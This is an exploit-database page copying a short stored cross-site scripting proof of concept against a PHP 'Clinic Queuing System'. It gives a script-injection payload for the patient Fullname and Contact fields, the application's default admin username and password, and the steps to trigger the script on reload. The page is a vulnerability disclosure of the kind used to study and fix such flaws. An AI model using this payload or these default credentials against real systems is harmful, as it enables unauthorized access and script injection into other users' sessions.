Clinic Queuing System - XSS

CVE Category Price Severity
Not specified CWE-79 (Improper Neutralization of Input During Web Page Generation) Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2023-04-15
Our sensors found this exploit at:

Below is a copy:

Clinic Queuing System - XSS
# Title : Clinic Queuing System - XSS
# Author : @Eawhitehat - Eren Arslan
# Demo available :
# CVE: N/A
Used Payload :
"><script>(/eawhitehat is here/)</script>

Admin account :
Username: admin
Password: sourcecodester&123

Method :
Connect to panel : http://localhost/login.php
1. After login with admin account, go to http://localhost/?page=manage_patient (+ Add Record)
2. Add the payload : "><script>(/eawhitehat is here/)</script> in ""Fullname", "Contact" and Save
3. After page reloaded your XSS Loaded
Enjoy !

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.